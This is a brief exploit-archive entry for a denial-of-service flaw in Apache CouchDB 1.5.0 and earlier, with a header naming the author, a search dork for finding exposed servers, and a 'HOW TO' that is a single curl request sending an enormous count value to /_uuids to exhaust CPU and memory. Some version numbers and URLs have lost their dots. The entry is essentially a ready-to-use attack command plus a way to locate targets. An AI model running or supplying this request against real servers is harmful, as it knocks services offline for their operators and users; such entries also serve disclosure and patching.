Apache CouchDB 1.5.0 and previous versions allows remote malicious users to cause a denial of service (CPU and memory consumption) via the count parameter to /_uuids.
# Exploit Title: Couchdb uuids DOS exploit
# Google Dork inurl: _uuids
# Date: 03/24/2014
# Exploit Author: KrustyHack
# Vendor Homepage: couchdbapacheorg/
# Software Link: couchdbapacheorg/
# Version: up to 150
# Tested on: Linux Couchdb up to 150
HOW TO
======
curl couchdb_target/_uuids?count=999999999999999999999999 ...